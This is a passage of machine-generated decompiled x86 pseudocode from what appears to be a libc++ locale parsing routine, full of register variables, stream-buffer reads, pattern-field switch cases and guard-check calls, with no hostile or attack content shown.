													 *((char*)(_t746 + 0x14)) = _t718;
													 *0xd57000();
													 *(_t746 + 0x228) = 2;
													_t621 =  *((intOrPtr*)( *((intOrPtr*)( *_t664 + 0x20))))();
													_t718 =  *((intOrPtr*)(_t746 + 0x14));
													_t664 =  *(_t746 + 4);
												} else {
													_t621 =  *_t618 & 0x0000ffff;
												}
												_t689 = 0;
												__eflags = _t621 - 0xffff;
												_t498 = _t621 == 0xffff;
												__eflags = _t498;
												_t622 = _t621 & 0xffffff00 | _t498;
												if(_t498 != 0) {
													_t689 = _t664;
												}
												 *(_t746 + 4) = _t689;
												__eflags = _t718 - _t622;
												if(_t718 == _t622) {
													goto L277;
												} else {
													L262:
													_t732 =  *_a4;
													_t602 =  *(_t732 + 0xc);
													__eflags = _t602 -  *((intOrPtr*)(_t732 + 0x10));
													if(_t602 ==  *((intOrPtr*)(_t732 + 0x10))) {
														_t664 =  *( *_t732 + 0x20);
														 *(_t746 + 0x228) = 0xffffffff;
														 *0xd57000();
														 *(_t746 + 0x228) = 2;
														_t733 =  *( *( *_t732 + 0x20))();
													} else {
														_t733 =  *_t602 & 0x0000ffff;
													}
													_t682 =  *(_t746 + 0xc);
													__eflags =  *((char*)(_t682 + 0xb));
													if( *((char*)(_t682 + 0xb)) < 0) {
														_t606 =  *((intOrPtr*)(_t682 + 4));
													} else {
														_t606 = L00C91E10(_t682, _t768);
													}
													__eflags = _t606 -  *(_t746 + 8);
													if(_t606 <  *(_t746 + 8)) {
														 *(_t746 + 0x228) = 0;
														_push("string index out of bounds");
														_push("__pos <= size()");
														_push(0xda1);
														_push("..\\..\\buildtools\\third_party\\libc++\\trunk\\include\\string");
														L00C96D4C(_t664, _t682, _t718, _t768, "%s:%d: assertion %s failed: %s");
														_push(_t750);
														_t748 =  &_v560;
														_t608 = L00CFF480(_t664, _t682, _t733, _t748, __eflags);
														_push( *((intOrPtr*)(_t748 + 0x218)));
														_t762 = _t758 + 0x14;
														_t749 =  &_v560;
														__eflags =  *((char*)(_t749 + 0x43));
														if( *((char*)(_t749 + 0x43)) < 0) {
															_t608 = L00CFDBEC( *((intOrPtr*)(_t749 + 0x38)));
															_t762 = _t762 + 4;
														}
														__eflags =  *((char*)(_t749 + 0x33));
														if( *((char*)(_t749 + 0x33)) < 0) {
															_t608 = L00CFDBEC( *((intOrPtr*)(_t749 + 0x28)));
															_t762 = _t762 + 4;
														}
														__eflags =  *((char*)(_t749 + 0x53));
														if( *((char*)(_t749 + 0x53)) < 0) {
															_t608 = L00CFDBEC( *((intOrPtr*)(_t749 + 0x48)));
															_t762 = _t762 + 4;
														}
														__eflags =  *((char*)(_t749 + 0x23));
														if( *((char*)(_t749 + 0x23)) < 0) {
															_t608 = L00CFDBEC( *((intOrPtr*)(_t749 + 0x18)));
															_t762 = _t762 + 4;
														}
														__eflags =  *((char*)(_t749 + 0x7b));
														if( *((char*)(_t749 + 0x7b)) < 0) {
															_t608 = L00CFDBEC( *((intOrPtr*)(_t749 + 0x70)));
															_t762 = _t762 + 4;
														}
														_t734 =  *(_t749 + 0x58);
														 *(_t749 + 0x58) = 0;
														__eflags = _t734;
														if(_t734 != 0) {
															 *0xd57000();
															_t608 =  *((intOrPtr*)( *((intOrPtr*)(_t749 + 0x5c))))(_t734);
															_t762 = _t762 + 4;
														}
														return _t608;
													} else {
														_t610 =  *(_t746 + 0xc);
														__eflags =  *((char*)(_t610 + 0xb));
														if( *((char*)(_t610 + 0xb)) < 0) {
															_t610 =  *( *(_t746 + 0xc));
														}
														_t684 =  *(_t746 + 8);
														__eflags = _t733 -  *((intOrPtr*)(_t610 + _t684 * 2));
														if(_t733 !=  *((intOrPtr*)(_t610 + _t684 * 2))) {
															goto L277;
														} else {
															 *(_t746 + 8) =  *(_t746 + 8) + 1;
															_t735 =  *_a4;
															_t612 =  *((intOrPtr*)(_t735 + 0xc));
															__eflags = _t612 -  *((intOrPtr*)(_t735 + 0x10));
															if(_t612 ==  *((intOrPtr*)(_t735 + 0x10))) {
																 *(_t746 + 0x228) = 0xffffffff;
																 *0xd57000();
																 *(_t746 + 0x228) = 2;
																 *((intOrPtr*)( *((intOrPtr*)( *_t735 + 0x24))))();
															} else {
																 *((intOrPtr*)(_t735 + 0xc)) = _t612 + 2;
															}
															continue;
														}
													}
												}
											}
											goto L304;
										}
										goto L275;
									}
								} else {
									L13:
									_t624 =  *((char*)(_t746 + _t720 + 0x68));
									__eflags = _t624 - 4;
									if(_t624 > 4) {
										L55:
										_t729 =  *(_t746 + 4);
										goto L236;
									} else {
										switch( *((intOrPtr*)(_t624 * 4 +  &M00D33088))) {
											case 0:
												__eflags = _t720 - 3;
												if(_t720 != 3) {
													goto L108;
												} else {
													_t729 =  *(_t746 + 4);
													goto L17;
												}
												goto L237;
											case 1:
												__eflags = __edx - 3;
												if(__edx != 3) {
													__eax = _a4;
													__edi =  *_a4;
													__eax =  *(__edi + 0xc);
													__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
													if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
														__eax =  *__edi;
														__ebx =  *( *__edi + 0x20);
														 *(__esi + 0x228) = 0xffffffff;
														__ecx = __ebx;
														__eax =  *0xd57000();
														 *(__esi + 0x228) = 2;
														__ecx = __edi;
														__eax =  *__ebx();
														__edi =  *__edi;
													} else {
														__edi =  *__eax & 0x0000ffff;
													}
													_a32 =  *_a32;
													__ebx =  *((intOrPtr*)( *_a32 + 0xc));
													 *(__esi + 0x228) = 0xffffffff;
													__ecx = __ebx;
													__eax =  *0xd57000();
													 *(__esi + 0x228) = 2;
													__eax = __di & 0x0000ffff;
													__ecx = _a32;
													_push(__di & 0x0000ffff);
													_push(8);
													__eax =  *__ebx();
													__eflags = __al;
													if(__al == 0) {
														goto L277;
													} else {
														__eax = _a4;
														__edi =  *_a4;
														__eax =  *(__edi + 0xc);
														__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
														if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
															__eax =  *__edi;
															__ebx =  *( *__edi + 0x24);
															 *(__esi + 0x228) = 0xffffffff;
															__ecx = __ebx;
															__eax =  *0xd57000();
															 *(__esi + 0x228) = 2;
															__ecx = __edi;
															__eax =  *__ebx();
														} else {
															__ecx = __eax + 2;
															 *(__edi + 0xc) = __eax + 2;
															__eax =  *__eax & 0x0000ffff;
														}
														__eax = __ax & 0x0000ffff;
														__ecx = __esi + 0x38;
														__eax = L00CB5E28(__ecx, __fp0, __ax & 0x0000ffff);
														while(1) {
															L108:
															_t693 = E00CB39FA(_t624, _a4);
															_t667 =  *(_t746 + 4);
															__eflags = _t667;
															if(_t667 == 0) {
																goto L111;
															}
															L109:
															_t642 =  *(_t667 + 0xc);
															__eflags = _t642 -  *((intOrPtr*)(_t667 + 0x10));
															if(_t642 ==  *((intOrPtr*)(_t667 + 0x10))) {
																 *(_t746 + 0x228) = 0xffffffff;
																 *(_t746 + 8) = _t693;
																 *0xd57000();
																 *(_t746 + 0x228) = 2;
																_t645 =  *((intOrPtr*)( *((intOrPtr*)( *_t667 + 0x20))))();
																_t693 =  *(_t746 + 8);
																_t667 =  *(_t746 + 4);
															} else {
																_t645 =  *_t642 & 0x0000ffff;
															}
															_t729 = 0;
															__eflags = _t645 - 0xffff;
															_t247 = _t645 == 0xffff;
															__eflags = _t247;
															_t646 = _t645 & 0xffffff00 | _t247;
															if(_t247 != 0) {
																_t729 = _t667;
															}
															__eflags = _t693 - _t646;
															if(_t693 == _t646) {
																L17:
																_t585 =  *(_t746 + 0xc);
																_t720 =  *((intOrPtr*)(_t746 + 0x10));
															} else {
																L117:
																 *(_t746 + 4) = _t729;
																_t738 =  *_a4;
																_t627 =  *(_t738 + 0xc);
																__eflags = _t627 -  *((intOrPtr*)(_t738 + 0x10));
																if(_t627 ==  *((intOrPtr*)(_t738 + 0x10))) {
																	 *(_t746 + 0x228) = 0xffffffff;
																	 *0xd57000();
																	 *(_t746 + 0x228) = 2;
																	_t739 =  *((intOrPtr*)( *((intOrPtr*)( *_t738 + 0x20))))();
																} else {
																	_t739 =  *_t627 & 0x0000ffff;
																}
																 *(_t746 + 0x228) = 0xffffffff;
																 *0xd57000();
																 *(_t746 + 0x228) = 2;
																_push(_t739 & 0x0000ffff);
																_push(8);
																_t635 =  *( *((intOrPtr*)( *_a32 + 0xc)))();
																__eflags = _t635;
																if(_t635 == 0) {
																	_t585 =  *(_t746 + 0xc);
																	_t720 =  *((intOrPtr*)(_t746 + 0x10));
																	goto L196;
																} else {
																	_t740 =  *_a4;
																	_t637 =  *(_t740 + 0xc);
																	__eflags = _t637 -  *((intOrPtr*)(_t740 + 0x10));
																	if(_t637 ==  *((intOrPtr*)(_t740 + 0x10))) {
																		 *(_t746 + 0x228) = 0xffffffff;
																		 *0xd57000();
																		 *(_t746 + 0x228) = 2;
																		_t640 =  *((intOrPtr*)( *((intOrPtr*)( *_t740 + 0x24))))();
																	} else {
																		 *(_t740 + 0xc) =  &(_t637[1]);
																		_t640 =  *_t637 & 0x0000ffff;
																	}
																	_t624 = L00CB5E28(_t746 + 0x38, _t768, _t640 & 0x0000ffff);
																	L108:
																	_t693 = E00CB39FA(_t624, _a4);
																	_t667 =  *(_t746 + 4);
																	__eflags = _t667;
																	if(_t667 == 0) {
																		goto L111;
																	}
																}
															}
															goto L237;
															L111:
															_t729 = 0;
															__eflags = _t693;
															if(_t693 == 0) {
																goto L117;
															} else {
																goto L17;
															}
															goto L237;
														}
													}
												} else {
													goto L55;
												}
												goto L304;
											case 2:
												__eflags =  *(__esi + 0xc);
												if( *(__esi + 0xc) != 0) {
													L56:
													__al =  *((intOrPtr*)(__esi + 0x23));
													__ebx = __esi + 0x18;
													__eflags = __al;
													if(__al < 0) {
														__ebx =  *(__esi + 0x18);
													}
													__eflags = __edx;
													if(__edx != 0) {
														goto L59;
													}
													goto L212;
												} else {
													__eflags = __edx - 2;
													if(__eflags < 0) {
														goto L56;
													} else {
														__eax = __eax & 0xffffff00 | __eflags == 0x00000000;
														__eflags =  *((char*)(__esi + 0x6b));
														__ecx = __ecx & 0xffffff00 |  *((char*)(__esi + 0x6b)) != 0x00000000;
														__cl = __cl & __al;
														__cl = __cl |  *(__esi + 0x80);
														__eflags = __cl - 1;
														if(__cl != 1) {
															__edi =  *(__esi + 4);
															__eax = 0;
															goto L237;
														} else {
															__al =  *((intOrPtr*)(__esi + 0x23));
															__ebx = __esi + 0x18;
															__eflags = __al;
															if(__al < 0) {
																__ebx =  *(__esi + 0x18);
															}
															L59:
															__ecx = __esi + 0x68;
															__eflags =  *((char*)(__edx + __ecx - 1)) - 1;
															if( *((char*)(__edx + __ecx - 1)) <= 1) {
																while(1) {
																	__eflags = __al;
																	if(__al < 0) {
																		__edi =  *(__esi + 0x18);
																		__eax =  *(__esi + 0x1c);
																	} else {
																		__edi = __esi + 0x18;
																		__ecx = __edi;
																		__eax = L00C91E10(__ecx, __fp0);
																	}
																	__eax = __edi + __eax * 2;
																	__eflags = __ebx - __eax;
																	 *(__esi + 8) = __ebx;
																	if(__ebx == __eax) {
																		break;
																	}
																	__ebx =  *__ebx & 0x0000ffff;
																	_a32 =  *_a32;
																	__edi =  *((intOrPtr*)( *_a32 + 0xc));
																	 *(__esi + 0x228) = 0xffffffff;
																	__ecx = __edi;
																	__eax =  *0xd57000();
																	 *(__esi + 0x228) = 2;
																	__ecx = _a32;
																	_push(__ebx);
																	_push(8);
																	__eax =  *__edi();
																	__eflags = __al;
																	__ebx =  *(__esi + 8);
																	if(__al != 0) {
																		__ebx = __ebx + 2;
																		__al =  *((intOrPtr*)(__esi + 0x23));
																		continue;
																	}
																	break;
																}
																__eflags =  *((char*)(__esi + 0x23));
																__eax = __esi + 0x18;
																if( *((char*)(__esi + 0x23)) < 0) {
																	__eax =  *(__esi + 0x18);
																}
																__edi = __ebx - __eax >> 1;
																__eflags =  *((char*)(__esi + 0x43));
																if( *((char*)(__esi + 0x43)) < 0) {
																	__eax =  *(__esi + 0x3c);
																} else {
																	__ecx = __esi + 0x38;
																	__eax = L00C91E10(__ecx, __fp0);
																}
																__eflags = __edi - __eax;
																if(__edi <= __eax) {
																	__eflags =  *((char*)(__esi + 0x23));
																	__ebx = __esi + 0x18;
																	if( *((char*)(__esi + 0x23)) < 0) {
																		__ebx =  *(__esi + 0x18);
																	}
																	 *(__esi + 0x14) = __edi;
																	__eflags =  *((char*)(__esi + 0x43));
																	__ecx = __esi + 0x38;
																	if( *((char*)(__esi + 0x43)) < 0) {
																		__ecx =  *(__esi + 0x38);
																		__eax =  *(__esi + 0x3c);
																		__edi = __ecx + __eax * 2;
																	} else {
																		__eax = L00C91E10(__ecx, __fp0);
																		__edi = __esi + __eax * 2;
																		__edi = __esi + __eax * 2 + 0x38;
																		__eflags =  *((char*)(__esi + 0x43));
																		if( *((char*)(__esi + 0x43)) < 0) {
																			__ecx =  *(__esi + 0x38);
																			__eax =  *(__esi + 0x3c);
																		} else {
																			__ecx = __esi + 0x38;
																			__eax = L00C91E10(__esi + 0x38, __fp0);
																			__ecx = __esi + 0x38;
																		}
																	}
																	__eax = __ecx + __eax * 2;
																	__ecx =  *(__esi + 0x14);
																	__ecx =  *(__esi + 0x14) +  *(__esi + 0x14);
																	__eax = __eax - __ecx;
																	__eflags = __eax;
																	while(1) {
																		__eflags = __eax - __edi;
																		if(__eax == __edi) {
																			break;
																		}
																		__ecx =  *__eax & 0x0000ffff;
																		__eflags = __cx -  *__ebx;
																		if(__cx !=  *__ebx) {
																			goto L185;
																		} else {
																			__eax = __eax + 2;
																			__ebx = __ebx + 2;
																			continue;
																		}
																		goto L212;
																	}
																	__ebx =  *(__esi + 8);
																} else {
																	L185:
																	__eflags =  *((char*)(__esi + 0x23));
																	__ebx = __esi + 0x18;
																	if( *((char*)(__esi + 0x23)) < 0) {
																		__ebx =  *(__esi + 0x18);
																	}
																	while(1) {
																		L212:
																		__eflags =  *((char*)(__esi + 0x23));
																		if( *((char*)(__esi + 0x23)) < 0) {
																			__edi =  *(__esi + 0x18);
																			__eax =  *(__esi + 0x1c);
																		} else {
																			__edi = __esi + 0x18;
																			__ecx = __edi;
																			__eax = L00C91E10(__ecx, __fp0);
																		}
																		__eax = __edi + __eax * 2;
																		__eflags = __ebx - __eax;
																		 *(__esi + 8) = __ebx;
																		if(__eflags == 0) {
																			break;
																		}
																		 *(__esi + 0x228) = 2;
																		__ecx = _a4;
																		__eax = E00CB39FA(__eax, _a4);
																		__edx = __eax;
																		__ebx =  *(__esi + 4);
																		__eflags = __ebx;
																		if(__ebx == 0) {
																			__ecx = 0;
																			__edi = 0;
																			__eflags = __dl;
																			__ebx =  *(__esi + 8);
																			if(__eflags == 0) {
																				goto L225;
																			} else {
																			}
																		} else {
																			__eax =  *(__ebx + 0xc);
																			__eflags = __eax -  *((intOrPtr*)(__ebx + 0x10));
																			if(__eax ==  *((intOrPtr*)(__ebx + 0x10))) {
																				__eax =  *__ebx;
																				__edi =  *( *__ebx + 0x20);
																				 *(__esi + 0x228) = 0xffffffff;
																				__ecx = __edi;
																				 *(__esi + 0x14) = __dl;
																				__eax =  *0xd57000();
																				 *(__esi + 0x228) = 2;
																				__ecx = __ebx;
																				__eax =  *__edi();
																				__dl =  *(__esi + 0x14);
																				__ebx =  *(__esi + 4);
																			} else {
																				__eax =  *__eax & 0x0000ffff;
																			}
																			__edi = 0;
																			__eflags = __ax - 0xffff;
																			_t440 = __ax == 0xffff;
																			__eflags = _t440;
																			__eax = __eax & 0xffffff00 | _t440;
																			if(_t440 != 0) {
																				__edi = __ebx;
																			}
																			__ecx = __edi;
																			__eflags = __dl - __al;
																			__ebx =  *(__esi + 8);
																			if(__eflags != 0) {
																				L225:
																				__eax = _a4;
																				__edi =  *_a4;
																				__eax =  *(__edi + 0xc);
																				__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
																				 *(__esi + 4) = __ecx;
																				if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
																					__eax =  *__edi;
																					__ebx =  *( *__edi + 0x20);
																					 *(__esi + 0x228) = 0xffffffff;
																					__ecx = __ebx;
																					__eax =  *0xd57000();
																					 *(__esi + 0x228) = 2;
																					__ecx = __edi;
																					__eax =  *__ebx();
																					__ecx =  *(__esi + 4);
																					__ebx =  *(__esi + 8);
																				} else {
																					__eax =  *__eax & 0x0000ffff;
																				}
																				__eflags = __ax -  *__ebx;
																				if(__eflags != 0) {
																					__edi = __ecx;
																				} else {
																					__eax = _a4;
																					__edi =  *_a4;
																					__eax =  *(__edi + 0xc);
																					__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
																					if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
																						__eax =  *__edi;
																						__ebx =  *( *__edi + 0x24);
																						 *(__esi + 0x228) = 0xffffffff;
																						__ecx = __ebx;
																						__eax =  *0xd57000();
																						 *(__esi + 0x228) = 2;
																						__ecx = __edi;
																						__eax =  *__ebx();
																					} else {
																						 *(__edi + 0xc) = __eax;
																					}
																					__ebx =  *(__esi + 8);
																					__ebx =  *(__esi + 8) + 2;
																					continue;
																				}
																			}
																		}
																		L235:
																		asm("bt dword [ebp+0x18], 0x9");
																		__edx =  *(__esi + 0x10);
																		if(__eflags < 0) {
																			__eflags =  *((char*)(__esi + 0x23));
																			if( *((char*)(__esi + 0x23)) < 0) {
																				__ecx =  *(__esi + 0x18);
																				__eax =  *(__esi + 0x1c);
																			} else {
																				__ebx = __edi;
																				__edi = __esi + 0x18;
																				__ecx = __edi;
																				__eax = L00C91E10(__edi, __fp0);
																				__edx =  *(__esi + 0x10);
																				__ecx = __edi;
																				__edi = __ebx;
																				__ebx =  *(__esi + 8);
																			}
																			__eflags = __ebx - __eax;
																			__eax =  *(__esi + 0xc);
																			if(__eflags == 0) {
																				goto L237;
																			} else {
																				goto L277;
																			}
																		} else {
																			goto L236;
																		}
																		goto L304;
																	}
																	__edi =  *(__esi + 4);
																	goto L235;
																}
															}
															goto L212;
														}
													}
												}
												goto L304;
											case 3:
												__eflags =  *((char*)(__esi + 0x53));
												if( *((char*)(__esi + 0x53)) < 0) {
													__eax =  *(__esi + 0x4c);
												} else {
													__eax = L00C91E10(__ecx, __fp0);
												}
												__eflags = __eax;
												if(__eax == 0) {
													L94:
													__eflags =  *((char*)(__esi + 0x33));
													if( *((char*)(__esi + 0x33)) < 0) {
														__eax =  *(__esi + 0x2c);
													} else {
														__ecx = __edi;
														__eax = L00C91E10(__edi, __fp0);
													}
													__eflags = __eax;
													if(__eax == 0) {
														L133:
														__eflags =  *((char*)(__esi + 0x53));
														if( *((char*)(__esi + 0x53)) < 0) {
															__eax =  *(__esi + 0x4c);
															__edi = __esi + 0x48;
														} else {
															__edi = __esi + 0x48;
															__ecx = __edi;
															__eax = L00C91E10(__edi, __fp0);
														}
														__eflags = __eax;
														if(__eax == 0) {
															L177:
															__eflags =  *((char*)(__esi + 0x53));
															if( *((char*)(__esi + 0x53)) < 0) {
																__eax =  *(__esi + 0x4c);
															} else {
																__ecx = __edi;
																__eax = L00C91E10(__edi, __fp0);
															}
															__edi = __esi + 0x28;
															__edx =  *(__esi + 0x10);
															__ecx =  *(__esi + 4);
															__eflags = __eax;
															if(__eax != 0) {
																L200:
																__eflags =  *((char*)(__esi + 0x33));
																if( *((char*)(__esi + 0x33)) < 0) {
																	__eax =  *(__esi + 0x2c);
																} else {
																	__ecx = __edi;
																	__eax = L00C91E10(__edi, __fp0);
																	__ecx =  *(__esi + 4);
																	__edx =  *(__esi + 0x10);
																}
																__eflags = __eax;
																__eax = _a28;
																 *__eax = __eflags == 0;
																__eflags =  *__eax;
															} else {
																__eflags =  *((char*)(__esi + 0x33));
																if( *((char*)(__esi + 0x33)) < 0) {
																	__eax =  *(__esi + 0x2c);
																} else {
																	__ecx = __edi;
																	__eax = L00C91E10(__edi, __fp0);
																	__ecx =  *(__esi + 4);
																	__edx =  *(__esi + 0x10);
																}
																__eflags = __eax;
																if(__eax != 0) {
																	goto L200;
																}
															}
															__edi = __ecx;
															L236:
															_t585 =  *(_t746 + 0xc);
															goto L237;
														} else {
															__eflags =  *((char*)(__esi + 0x33));
															if( *((char*)(__esi + 0x33)) < 0) {
																__eax =  *(__esi + 0x2c);
															} else {
																__ecx = __esi + 0x28;
																__eax = L00C91E10(__esi + 0x28, __fp0);
															}
															__eflags = __eax;
															if(__eax != 0) {
																goto L277;
															} else {
																goto L177;
															}
														}
													} else {
														__eax = _a4;
														__edi =  *_a4;
														__eax =  *(__edi + 0xc);
														__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
														if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
															__eax =  *__edi;
															__ebx =  *( *__edi + 0x20);
															 *(__esi + 0x228) = 0xffffffff;
															__ecx = __ebx;
															__eax =  *0xd57000();
															 *(__esi + 0x228) = 2;
															__ecx = __edi;
															__eax =  *__ebx();
															__edi =  *__edi;
														} else {
															__edi =  *__eax & 0x0000ffff;
														}
														__al =  *((intOrPtr*)(__esi + 0x33));
														__eflags = __al;
														if(__al < 0) {
															L129:
															__ebx =  *(__esi + 0x28);
														} else {
															__ebx = __esi + 0x28;
															__ecx = __ebx;
															__eax = L00C91E10(__ebx, __fp0);
															__al =  *((intOrPtr*)(__esi + 0x33));
															__eflags = __al;
															if(__al < 0) {
																goto L129;
															}
														}
														__eflags = __di -  *__ebx;
														if(__di !=  *__ebx) {
															goto L133;
														} else {
															__ecx = _a4;
															__edi =  *_a4;
															__ecx =  *(__edi + 0xc);
															__eflags = __ecx -  *((intOrPtr*)(__edi + 0x10));
															if(__ecx ==  *((intOrPtr*)(__edi + 0x10))) {
																__eax =  *__edi;
																__ebx =  *( *__edi + 0x24);
																 *(__esi + 0x228) = 0xffffffff;
																__ecx = __ebx;
																__eax =  *0xd57000();
																 *(__esi + 0x228) = 2;
																__ecx = __edi;
																__eax =  *__ebx();
																__al =  *((intOrPtr*)(__esi + 0x33));
															} else {
																 *(__edi + 0xc) = __ecx;
															}
															__ecx = _a28;
															 *__ecx = 1;
															__eflags = __al;
															__edi = __esi + 0x28;
															if(__al < 0) {
																__eax =  *(__esi + 0x2c);
															} else {
																goto L194;
															}
															goto L195;
														}
													}
												} else {
													__eax = _a4;
													__edi =  *_a4;
													__eax =  *(__edi + 0xc);
													__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
													if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
														__eax =  *__edi;
														__ebx =  *( *__edi + 0x20);
														 *(__esi + 0x228) = 0xffffffff;
														__ecx = __ebx;
														__eax =  *0xd57000();
														 *(__esi + 0x228) = 2;
														__ecx = __edi;
														__eax =  *__ebx();
														__edi =  *__edi;
													} else {
														__edi =  *__eax & 0x0000ffff;
													}
													__al =  *((intOrPtr*)(__esi + 0x53));
													__eflags = __al;
													if(__al < 0) {
														L90:
														__ebx =  *(__esi + 0x48);
													} else {
														__ebx = __esi + 0x48;
														__ecx = __ebx;
														__eax = L00C91E10(__ebx, __fp0);
														__al =  *((intOrPtr*)(__esi + 0x53));
														__eflags = __al;
														if(__al < 0) {
															goto L90;
														}
													}
													__eflags = __di -  *__ebx;
													__edi = __esi + 0x28;
													if(__di !=  *__ebx) {
														goto L94;
													} else {
														__ecx = _a4;
														__edi =  *_a4;
														__ecx =  *(__edi + 0xc);
														__eflags = __ecx -  *((intOrPtr*)(__edi + 0x10));
														if(__ecx ==  *((intOrPtr*)(__edi + 0x10))) {
															__eax =  *__edi;
															__ebx =  *( *__edi + 0x24);
															 *(__esi + 0x228) = 0xffffffff;
															__ecx = __ebx;
															__eax =  *0xd57000();
															 *(__esi + 0x228) = 2;
															__ecx = __edi;
															__eax =  *__ebx();
															__al =  *((intOrPtr*)(__esi + 0x53));
														} else {
															 *(__edi + 0xc) = __ecx;
														}
														__ecx = _a28;
														 *__ecx = 0;
														__eflags = __al;
														__edi = __esi + 0x48;
														if(__al >= 0) {
															L194:
															__ecx = __edi;
															__eax = L00C91E10(__ecx, __fp0);
														} else {
															__eax =  *(__esi + 0x4c);
														}
														L195:
														__edx =  *(__esi + 0x10);
														__eflags = __eax - 2;
														__eax =  *(__esi + 0xc);
														__eax =  >=  ? __edi :  *(__esi + 0xc);
														L196:
														_t729 =  *(_t746 + 4);
														goto L237;
													}
												}
												goto L304;
											case 4:
												 *(__esi + 0x14) = 0;
												while(1) {
													__ecx = _a4;
													__edx = __eax;
													__ebx =  *(__esi + 4);
													__eflags = __ebx;
													if(__ebx == 0) {
														goto L22;
													}
													L20:
													__eax =  *(__ebx + 0xc);
													__eflags = __eax -  *((intOrPtr*)(__ebx + 0x10));
													if(__eax ==  *((intOrPtr*)(__ebx + 0x10))) {
														__eax =  *__ebx;
														__edi =  *( *__ebx + 0x20);
														 *(__esi + 0x228) = 0xffffffff;
														__ecx = __edi;
														 *(__esi + 8) = __dl;
														__eax =  *0xd57000();
														 *(__esi + 0x228) = 2;
														__ecx = __ebx;
														__eax =  *__edi();
														__dl =  *(__esi + 8);
														__ebx =  *(__esi + 4);
													} else {
														__eax =  *__eax & 0x0000ffff;
													}
													__edi = 0;
													__eflags = __ax - 0xffff;
													_t91 = __ax == 0xffff;
													__eflags = _t91;
													__eax = __eax & 0xffffff00 | _t91;
													if(_t91 != 0) {
														__edi = __ebx;
													}
													__ecx = __edi;
													__eflags = __dl - __al;
													if(__dl != __al) {
														L28:
														 *(__esi + 4) = __ecx;
														__eax = _a4;
														__edi =  *_a4;
														__eax =  *(__edi + 0xc);
														__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
														if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
															__eax =  *__edi;
															__ebx =  *( *__edi + 0x20);
															 *(__esi + 0x228) = 0xffffffff;
															__ecx = __ebx;
															__eax =  *0xd57000();
															 *(__esi + 0x228) = 2;
															__ecx = __edi;
															__eax =  *__ebx();
														} else {
															__eax =  *__eax & 0x0000ffff;
														}
														 *(__esi + 8) = __ax;
														__ebx = _a32;
														__eax =  *__ebx;
														__edi =  *( *__ebx + 0xc);
														 *(__esi + 0x228) = 0xffffffff;
														__ecx = __edi;
														__eax =  *0xd57000();
														 *(__esi + 0x228) = 2;
														__eax =  *(__esi + 8) & 0x0000ffff;
														__ecx = __ebx;
														_push( *(__esi + 8) & 0x0000ffff);
														_push(4);
														__eax =  *__edi();
														__eflags = __al;
														if(__al == 0) {
															__eflags =  *((char*)(__esi + 0x7b));
															__edi =  *(__esi + 8) & 0x0000ffff;
															if( *((char*)(__esi + 0x7b)) < 0) {
																__eax =  *(__esi + 0x74);
															} else {
																__ecx = __esi + 0x70;
																__eax = L00C91E10(__esi + 0x70, __fp0);
															}
															__ecx =  *(__esi + 4);
															__edx =  *(__esi + 0x14);
															__eflags = __eax;
															if(__eax == 0) {
																L72:
																__edi = __ecx;
															} else {
																__eflags = __edx;
																if(__edx == 0) {
																	goto L72;
																} else {
																	__eflags = __di -  *((intOrPtr*)(__esi + 0x60));
																	if(__di !=  *((intOrPtr*)(__esi + 0x60))) {
																		goto L72;
																	} else {
																		__eax =  *(__esi + 0x24);
																		__eflags = __eax -  *(__esi + 0x6c);
																		if(__eflags == 0) {
																			__eax = __esi + 0x6c;
																			_push(__esi + 0x6c);
																			__esi + 0x24 = __esi + 0x58;
																			__eax = E00CAA336(__ecx, __eflags, __esi + 0x58, __esi + 0x24);
																			__eax =  *(__esi + 0x24);
																			__edx =  *(__esi + 0x14);
																		}
																		__ecx = __eax + 4;
																		 *(__esi + 0x24) = __eax + 4;
																		 *__eax = __edx;
																		__eax = 0;
																		__eflags = 0;
																		goto L44;
																	}
																}
															}
														} else {
															__edx = _a40;
															__eax =  *__edx;
															__eflags = __eax - _a44;
															__edi =  *(__esi + 8) & 0x0000ffff;
															if(__eflags == 0) {
																__eax =  &_a44;
																_push( &_a44);
																_push(__edx);
																_push(_a36);
																__eax = E00CAC09F(__ebx, __ecx, __edi, __esi, __eflags, __fp0);
																__esp = __esp + 0xc;
																__edx = _a40;
																__eax =  *__edx;
																__edi =  *(__esi + 8) & 0x0000ffff;
															}
															_t112 = __eax + 2; // 0x2
															__ecx = _t112;
															 *__edx = _t112;
															 *__eax = __di;
															__eax =  *(__esi + 0x14);
															__eax =  *(__esi + 0x14) + 1;
															L44:
															 *(__esi + 0x14) = __eax;
															__eax = _a4;
															__edi =  *_a4;
															__eax =  *(__edi + 0xc);
															__eflags = __eax -  *((intOrPtr*)(__edi + 0x10));
															if(__eax ==  *((intOrPtr*)(__edi + 0x10))) {
																__eax =  *__edi;
																__ebx =  *( *__edi + 0x24);
																 *(__esi + 0x228) = 0xffffffff;
																__ecx = __ebx;
																__eax =  *0xd57000();
																 *(__esi + 0x228) = 2;
																__ecx = __edi;
																__eax =  *__ebx();
															} else {
																__eax = __eax + 2;
																 *(__edi + 0xc) = __eax;
															}
															__ecx = _a4;
															__edx = __eax;
															__ebx =  *(__esi + 4);
															__eflags = __ebx;
															if(__ebx == 0) {
																goto L22;
															}
														}
													}
													L73:
													__eax =  *(__esi + 0x24);
													__eflags =  *((intOrPtr*)(__esi + 0x58)) - __eax;
													__edx =  *(__esi + 0x14);
													if( *((intOrPtr*)(__esi + 0x58)) != __eax) {
														__eflags = __edx;
														if(__edx != 0) {
															__eflags = __eax -  *(__esi + 0x6c);
															if(__eflags == 0) {
																 *(__esi + 4) = __edi;
																__eax = __esi + 0x6c;
																_push(__esi + 0x6c);
																__esi + 0x24 = __esi + 0x58;
																__eax = E00CAA336(__ecx, __eflags, __esi + 0x58, __esi + 0x24);
																__eax =  *(__esi + 0x24);
																__edi =  *(__esi + 4);
																__edx =  *(__esi + 0x14);
															}
															__ecx = __eax + 4;
															 *(__esi + 0x24) = __eax + 4;
															 *__eax = __edx;
														}
